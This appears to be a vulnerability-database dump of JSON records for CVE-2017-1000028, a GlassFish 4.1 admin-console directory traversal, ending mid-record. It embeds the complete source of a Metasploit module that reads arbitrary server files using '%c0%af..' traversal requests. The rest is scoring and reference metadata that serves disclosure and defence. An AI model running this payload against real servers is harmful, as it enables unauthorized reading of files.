GlassFish Server Open Source Edition 3.1.2.2 Vulnerabilities
{"id": "MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL", "type": "metasploit", "bulletinFamily": "exploit", "title": "Path Traversal in Oracle GlassFish Server Open Source Edition", "description": "This module exploits an unauthenticated directory traversal vulnerability which exists in administration console of Oracle GlassFish Server 4.1, which is listening by default on port 4848/TCP.\n", "published": "2018-07-31T12:29:03", "modified": "2020-10-02T20:00:37", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028", "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904"], "cvelist": ["CVE-2017-1000028"], "lastseen": "2020-10-12T20:23:52", "viewCount": 745, "enchantments": {"dependencies": {"modified": "2020-10-12T20:23:52", "references": [{"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:45198", "EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}], "rev": 2}, "score": {"modified": "2020-10-12T20:23:52", "rev": 2, "value": 6.0, "vector": "NONE"}, "vulnersScore": 6.0}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/glassfish_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Path Traversal in Oracle GlassFish Server Open Source Edition',\n 'Description' => %q{\n This module exploits an unauthenticated directory 
traversal vulnerability\n which exists in administration console of Oracle GlassFish Server 4.1, which is\n listening by default on port 4848/TCP.\n },\n 'References' =>\n [\n ['CVE', '2017-1000028'],\n ['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'],\n ['EDB', '39441']\n ],\n 'Author' =>\n [\n 'Trustwave SpiderLabs', # Vulnerability discovery\n 'Dhiraj Mishra' # Metasploit module\n ],\n 'DisclosureDate' => '2015-08-08',\n 'License' => MSF_LICENSE\n ))\n\n register_options(\n [\n Opt::RPORT(4848),\n OptString.new('FILEPATH', [true, \"The path to the file to read\", '/windows/win.ini']),\n OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])\n ])\n end\n\n def run_host(ip)\n filename = datastore['FILEPATH']\n traversal = \"%c0%af..\" * datastore['DEPTH'] << filename\n\n res = send_request_raw({\n 'method' => 'GET',\n 'uri' => \"/theme/META-INF/prototype#{traversal}\"\n })\n\n unless res && res.code == 200\n print_error('Nothing was downloaded')\n return\n end\n\n vprint_good(\"#{peer} - #{res.body}\")\n path = store_loot(\n 'oracle.traversal',\n 'text/plain',\n ip,\n res.body,\n filename\n )\n print_good(\"File saved in: #{path}\")\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "immutableFields": [], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": 
"NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "edition": 2, "scheme": null}
{"cve": [{"id": "CVE-2017-1000028", "bulletinFamily": "NVD", "title": "CVE-2017-1000028", "description": "Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.", "published": "2017-07-17T13:18:00", "modified": "2019-05-03T18:27:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000028", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/45196/", "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904", "https://www.exploit-db.com/exploits/45198/"], "cvelist": ["CVE-2017-1000028"], "type": "cve", "lastseen": "2021-04-23T00:07:43", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "oracle:glassfish_server", "name": "oracle glassfish server", "operator": "eq", "version": "4.1"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:oracle:glassfish_server:4.1"], "cpe23": ["cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2017-1000028"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": 
{"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-22"], "description": "Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-10-03T13:07:30", "references": [{"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:45198", "EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2020-10-03T13:07:30", "rev": 2, "value": 3.9, "vector": "NONE"}}, "extraReferences": [], "hash": "93d190134f7cf056fe1732b6c35e20814272faa00585934c7933123ebba28687", "hashmap": [{"hash": "6c12cee4678f175d08f6be18c93abe3e", "key": "cpe23"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "cc9731cf4c024746d3d1b6370c53849a", "key": "cpeConfiguration"}, {"hash": "0658497da393ba8e7c2a5f76cfc6647b", "key": "cwe"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "3434de2b1fab19da569c39a081dfad06", "key": "cpe"}, {"hash": "d9ff80eb1f8f16ad5085cb0c6512d073", "key": "references"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "ac3f4b8c5744f5fcafa5a05b0b3a6863", "key": "description"}, {"hash": "2eb2483a6f217835f88c76c0674603c3", "key": "href"}, {"hash": 
"bdf8ed67a9997025a9a245b20ac4e383", "key": "cvelist"}, {"hash": "fa6976392906bf29d603e82c07318c8e", "key": "modified"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e1caac248b67c5f0c5b467c530f7a100", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "8d39331d3e12d1c5a584bab92bd505a6", "key": "title"}, {"hash": "9976eff579ef3bfd6a4237accaf3acdb", "key": "cvss3"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "54eea28cd58a8b1970d9e051e4c324e6", "key": "published"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000028", "id": "CVE-2017-1000028", "lastseen": "2020-10-03T13:07:30", "modified": "2019-05-03T18:27:00", "objectVersion": "1.3", "published": "2017-07-17T13:18:00", "references": ["https://www.exploit-db.com/exploits/45196/", "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904", "https://www.exploit-db.com/exploits/45198/"], "reporter": "cve@mitre.org", "title": "CVE-2017-1000028", "type": "cve", "viewCount": 21}, "differentElements": ["extraReferences"], "edition": 3, "lastseen": "2020-10-03T13:07:30"}, {"bulletin": {"affectedSoftware": [{"name": "oracle glassfish_server", "operator": "eq", "version": "4.1"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:oracle:glassfish_server:4.1"], "cpe23": ["cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*"], "cvelist": ["CVE-2017-1000028"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, 
"obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-22"], "description": "Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:16:45", "references": [{"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:45198", "EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2019-05-29T18:16:45", "rev": 2, "value": 3.9, "vector": "NONE"}}, "hash": "c0dc08e70d504725e6d781a0aa9f9280156e9c6edd21181224d83d28a7b78e48", "hashmap": [{"hash": "6c12cee4678f175d08f6be18c93abe3e", "key": "cpe23"}, {"hash": "0658497da393ba8e7c2a5f76cfc6647b", "key": "cwe"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "3434de2b1fab19da569c39a081dfad06", "key": "cpe"}, {"hash": "d9ff80eb1f8f16ad5085cb0c6512d073", "key": "references"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "ac3f4b8c5744f5fcafa5a05b0b3a6863", "key": "description"}, {"hash": "c79a01038c69351f5f90791c61613a99", "key": "affectedSoftware"}, {"hash": 
"2eb2483a6f217835f88c76c0674603c3", "key": "href"}, {"hash": "bdf8ed67a9997025a9a245b20ac4e383", "key": "cvelist"}, {"hash": "fa6976392906bf29d603e82c07318c8e", "key": "modified"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "8d39331d3e12d1c5a584bab92bd505a6", "key": "title"}, {"hash": "9976eff579ef3bfd6a4237accaf3acdb", "key": "cvss3"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "54eea28cd58a8b1970d9e051e4c324e6", "key": "published"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000028", "id": "CVE-2017-1000028", "lastseen": "2019-05-29T18:16:45", "modified": "2019-05-03T18:27:00", "objectVersion": "1.3", "published": "2017-07-17T13:18:00", "references": ["https://www.exploit-db.com/exploits/45196/", "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904", "https://www.exploit-db.com/exploits/45198/"], "reporter": "cve@mitre.org", "title": "CVE-2017-1000028", "type": "cve", "viewCount": 17}, "differentElements": ["affectedSoftware"], "edition": 1, "lastseen": "2019-05-29T18:16:45"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "oracle:glassfish_server", "name": "oracle glassfish server", "operator": "eq", "version": "4.1"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:oracle:glassfish_server:4.1"], "cpe23": ["cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2017-1000028"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, 
"confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-22"], "description": "Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.", "edition": 4, "enchantments": {"dependencies": {"modified": "2021-02-02T06:36:31", "references": [{"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:45198", "EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2021-02-02T06:36:31", "rev": 2, "value": 3.9, "vector": "NONE"}}, "extraReferences": [{"name": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904"}, {"name": "45198", "refsource": "EXPLOIT-DB", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": 
"https://www.exploit-db.com/exploits/45198/"}, {"name": "45196", "refsource": "EXPLOIT-DB", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/45196/"}], "hash": "1727c5320a9d7fe7ca3977bcce2f8fa65862be7623c615ded6ff0ed6597a15e3", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "6c12cee4678f175d08f6be18c93abe3e", "key": "cpe23"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "cc9731cf4c024746d3d1b6370c53849a", "key": "cpeConfiguration"}, {"hash": "0658497da393ba8e7c2a5f76cfc6647b", "key": "cwe"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "3434de2b1fab19da569c39a081dfad06", "key": "cpe"}, {"hash": "d9ff80eb1f8f16ad5085cb0c6512d073", "key": "references"}, {"hash": "4b0aeedbf5a206718c463a4a6583d5b6", "key": "extraReferences"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "ac3f4b8c5744f5fcafa5a05b0b3a6863", "key": "description"}, {"hash": "2eb2483a6f217835f88c76c0674603c3", "key": "href"}, {"hash": "bdf8ed67a9997025a9a245b20ac4e383", "key": "cvelist"}, {"hash": "fa6976392906bf29d603e82c07318c8e", "key": "modified"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e1caac248b67c5f0c5b467c530f7a100", "key": "affectedSoftware"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "8d39331d3e12d1c5a584bab92bd505a6", "key": "title"}, {"hash": "9976eff579ef3bfd6a4237accaf3acdb", "key": "cvss3"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "54eea28cd58a8b1970d9e051e4c324e6", "key": "published"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000028", "id": "CVE-2017-1000028", "immutableFields": [], "lastseen": "2021-02-02T06:36:31", "modified": "2019-05-03T18:27:00", "objectVersion": "1.5", "published": "2017-07-17T13:18:00", "references": 
["https://www.exploit-db.com/exploits/45196/", "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904", "https://www.exploit-db.com/exploits/45198/"], "reporter": "cve@mitre.org", "title": "CVE-2017-1000028", "type": "cve", "viewCount": 22}, "different_elements": ["cpeConfiguration"], "edition": 4, "lastseen": "2021-02-02T06:36:31"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "oracle:glassfish_server", "name": "oracle glassfish server", "operator": "eq", "version": "4.1"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:oracle:glassfish_server:4.1"], "cpe23": ["cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2017-1000028"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-22"], "description": "Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.", "edition": 2, 
"enchantments": {"dependencies": {"modified": "2020-09-21T14:31:17", "references": [{"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:45198", "EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2020-09-21T14:31:17", "rev": 2, "value": 3.9, "vector": "NONE"}}, "hash": "9fa3f580009ef4308fc2063843f4eda5a188c2a1ff2726b9c1e28a2919ca731e", "hashmap": [{"hash": "6c12cee4678f175d08f6be18c93abe3e", "key": "cpe23"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "0658497da393ba8e7c2a5f76cfc6647b", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "3434de2b1fab19da569c39a081dfad06", "key": "cpe"}, {"hash": "d9ff80eb1f8f16ad5085cb0c6512d073", "key": "references"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "ac3f4b8c5744f5fcafa5a05b0b3a6863", "key": "description"}, {"hash": "2eb2483a6f217835f88c76c0674603c3", "key": "href"}, {"hash": "bdf8ed67a9997025a9a245b20ac4e383", "key": "cvelist"}, {"hash": "fa6976392906bf29d603e82c07318c8e", "key": "modified"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e1caac248b67c5f0c5b467c530f7a100", "key": "affectedSoftware"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "8d39331d3e12d1c5a584bab92bd505a6", "key": "title"}, {"hash": "9976eff579ef3bfd6a4237accaf3acdb", "key": "cvss3"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "54eea28cd58a8b1970d9e051e4c324e6", "key": "published"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000028", "id": "CVE-2017-1000028", "lastseen": 
"2020-09-21T14:31:17", "modified": "2019-05-03T18:27:00", "objectVersion": "1.3", "published": "2017-07-17T13:18:00", "references": ["https://www.exploit-db.com/exploits/45196/", "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904", "https://www.exploit-db.com/exploits/45198/"], "reporter": "cve@mitre.org", "title": "CVE-2017-1000028", "type": "cve", "viewCount": 17}, "differentElements": ["cpeConfiguration"], "edition": 2, "lastseen": "2020-09-21T14:31:17"}], "edition": 5, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "e1caac248b67c5f0c5b467c530f7a100"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "3434de2b1fab19da569c39a081dfad06"}, {"key": "cpe23", "hash": "6c12cee4678f175d08f6be18c93abe3e"}, {"key": "cpeConfiguration", "hash": "ecbb03fbf0603c00f8bb90de8a2a0f59"}, {"key": "cvelist", "hash": "bdf8ed67a9997025a9a245b20ac4e383"}, {"key": "cvss", "hash": "a89198c45ce87f7ec9735a085150b708"}, {"key": "cvss2", "hash": "9bc143c7676b7e5a3fd9537d7507310b"}, {"key": "cvss3", "hash": "9976eff579ef3bfd6a4237accaf3acdb"}, {"key": "cwe", "hash": "0658497da393ba8e7c2a5f76cfc6647b"}, {"key": "description", "hash": "ac3f4b8c5744f5fcafa5a05b0b3a6863"}, {"key": "extraReferences", "hash": "4b0aeedbf5a206718c463a4a6583d5b6"}, {"key": "href", "hash": "2eb2483a6f217835f88c76c0674603c3"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "fa6976392906bf29d603e82c07318c8e"}, {"key": "published", "hash": "54eea28cd58a8b1970d9e051e4c324e6"}, {"key": "references", "hash": "d9ff80eb1f8f16ad5085cb0c6512d073"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "8d39331d3e12d1c5a584bab92bd505a6"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "a21b44a7fca00f8e9385dd0619746f212d9f8168a4818577829d6ed6fc994a25", 
"viewCount": 33, "enchantments": {"dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:148892"]}, {"type": "nessus", "idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:45196", "EDB-ID:45198"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806848"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"]}], "modified": "2021-04-23T00:07:43", "rev": 2}, "score": {"value": 3.9, "vector": "NONE", "modified": "2021-04-23T00:07:43", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/a:oracle:glassfish_server:4.1"], "affectedSoftware": [{"cpeName": "oracle:glassfish_server", "name": "oracle glassfish server", "operator": "eq", "version": "4.1"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cpe23": ["cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*"], "cwe": ["CWE-22"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": 
"OR"}]}, "extraReferences": [{"name": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904"}, {"name": "45198", "refsource": "EXPLOIT-DB", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/45198/"}, {"name": "45196", "refsource": "EXPLOIT-DB", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/45196/"}], "immutableFields": []}], "ubuntucve": [{"id": "UB:CVE-2017-1000028", "vendorId": null, "hash": "a42f6aeb5c6e16a4e2934bc63826957a", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2017-1000028", "description": "Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both\nauthenticated and unauthenticated Directory Traversal vulnerability, that\ncan be exploited by issuing a specially crafted HTTP GET request.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | vulnerable code not present in package.\n", "published": "2017-07-17T00:00:00", "modified": "2017-07-17T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": 